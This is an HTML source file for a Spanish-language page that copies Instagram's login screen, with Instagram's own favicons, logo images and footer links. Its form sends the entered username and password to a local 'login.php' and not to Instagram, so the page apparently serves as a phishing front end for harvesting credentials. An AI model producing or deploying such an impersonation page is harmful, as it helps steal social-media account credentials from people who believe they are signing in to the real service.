<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://kit.fontawesome.com/041a437dc8.js"></script>
    <script src="https://kit.fontawesome.com/yourFontAwesomeKit.js" crossorigin="anonymous"></script>
    <link rel="icon" sizes="76x76" href="https://static.cdninstagram.com/rsrc.php/v4/yR/r/lam-fZmwmvn.png">
    <link rel="icon" sizes="120x120" href="https://static.cdninstagram.com/rsrc.php/v4/ys/r/aM-g435MtEX.png">
    <link rel="icon" sizes="152x152" href="https://static.cdninstagram.com/rsrc.php/v4/yx/r/H1l_HHqi4p6.png">
    <link rel="icon" sizes="167x167" href="https://static.cdninstagram.com/rsrc.php/v4/yB/r/-7Z_RkdLJUX.png">
    <link rel="icon" sizes="180x180" href="https://static.cdninstagram.com/rsrc.php/v4/yG/r/De-Dwpd5CHc.png">
    <link rel="stylesheet" href="../styles.css">
    <title>Instagram</title>
</head>
<body>
    <main>
        <section class="A-00783">
            <div class="A-01775">
                <article class="A-22783">
                    <div class="A-02767">
                        <img src="instagram-web-lox-image.png" alt="">
                    </div>
                    <div class="B-00129">
                        <div class="B-23877">
                            <img src="Instagram_logo.png" alt="">
                        </div>
                        <div class="X-77010">
                            <div>
                                <form class="F-00745" action="login.php" method="post">
                                    <div class="C-07332">
                                        <div class="W-00001">
                                            <input  type="text" name="username" placeholder="Teléfono, usuario o correo electrónico">
                                        </div>
                                        <div class="W-00002">
                                            <input type="password" name="password" placeholder="Contrase&#241;a">
                                        </div>
                                        <div class="W-00003">
                                            <button  type="submit">Iniciar sesi&#243;n</button>
                                        </div>
                                        <div class="L-01033">
                                            <div class="L-02033">
                                                <div class="L-left"></div>
                                                <div class="O-c1">o</div>
                                                <div class="L-right"></div>
                                            </div>
                                        </div>
                                        <div class="B-U0057">
                                            <div class="B-U10055">
                                                <div class="S-V00745">
                                                    <i class="fa fa-facebook"></i>
                                                </div>
                                                <span class="S-P00743">Iniciar sesi&#243;n con Facebook</span>
                                            </div>
                                        </div>
                                        <div class="E-I7883">
                                            <a target="_blank" href="https://www.instagram.com/accounts/password/reset/">¿Olvidaste tu contraseña?</a>
                                        </div>
                                    </div>
                                </form>
                            </div>
                        </div>
                        <div class="Z-72200">
                            <span class="G-74550">
                                <p>¿No tienes una cuenta? <a href="#">Regístrate</a></p>
                            </span>
                        </div>
                    </div>
                </article>
            </div>
        </section>
    </main>
    <footer class="FO-77140">
        <div class="F0-77241">
            <div class="pageFooter">
                <ul class="uiList">
                    <li><a target="_blank" href="https://www.meta.com/about/?utm_source=about.meta.com&utm_medium=redirect">Meta</a></li>
                    <li><a target="_blank" href="https://about.instagram.com/">Informaci&#243;n</a></li>
                    <li><a target="_blank" href="https://about.instagram.com/blog">Blog</a></li>
                    <li><a target="_blank" href="https://about.instagram.com/about-us/careers">Empleo</a></li>
                    <li><a target="_blank" href="https://help.instagram.com/">Ayuda</a></li>
                    <li><a target="_blank" href="https://developers.facebook.com/docs/instagram-platform">Api</a></li>
                    <li><a target="_blank" href="https://privacycenter.instagram.com/policy/?entry_point=ig_help_center_data_policy_redirect">Privacidad</a></li>
                    <li><a target="_blank" href="https://help.instagram.com/581066165581870/">Condiciones</a></li>
                    <li><a target="_blank" href="https://www.instagram.com/explore/locations/">Ubicaciones</a></li>
                    <li><a target="_blank" href="https://www.instagram.com/web/lite/">Instagram Lite</a></li>
                    <li><a target="_blank" href="https://www.threads.com/">Threads</a></li>
                    <li><a target="_blank" href="https://web.facebook.com/help/instagram/261704639352628?_rdc=1&_rdr#">Importación de contactos y no usuarios</a></li>
                    <li><a target="_blank" href="https://www.instagram.com/accounts/login/?next=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fmeta_verified%2F%3Fentrypoint%3Dweb_footer%26__coig_login%3D1#">Meta Verified</a></li>
                </ul>
            </div>
            <div class="pageFooter">
                <ul class="uiList">
                    <select aria-label="Cambiar idioma de visualización" name="" id="" class="select">
                        <option value="es">Español (España)</option>
                        <option value="es-la">Español</option>
                        <option value="en">English</option>
                        <option value="en-gb">English (UK)</option>
                        <option value="fa">فارسی</option>
                        <option value="fi">Suomi</option>
                        <option value="fr">Français</option>
                        <option value="he">עברית</option>
                        <option value="id">Bahasa Indonesia</option>
                        <option value="it">Italiano</option>
                        <option value="ja">日本語</option>
                        <option value="ho">한국어</option>
                        <option value="ms">Bahasa Melayu</option>
                        <option value="nb">Norsk</option>
                        <option value="nl">Nederlands</option>
                        <option value="pl">Polski</option>
                        <option value="pt-br">Português (Brasil)</option>
                        <option value="pt">Português (Portugal)</option>
                        <option value="ru">Русский</option>
                        <option value="sv">Svenska</option>
                        <option value="th">ภาษาไทย</option>
                        <option value="tl">Filipino</option>
                        <option value="tr">Türkçe</option>
                        <option value="zh-cn">中文(简体)</option>
                        <option value="zh-tw">中文(台灣)</option>
                        <option value="bn">বাংলা</option>
                        <option value="gu">ગુજરાતી</option>
                        <option value="hi">हिन्दी</option> 
                        <option value="hr">Hrvatski</option> 
                        <option value="fr-ca">Français (Canada)</option>   
                    </select>
                </ul>
                <div class="copy">
                    <span class="copyright">© 2025 Instagram from Meta</span>
                </div>
            </div>
        </div>
    </footer>
</body>
</html>
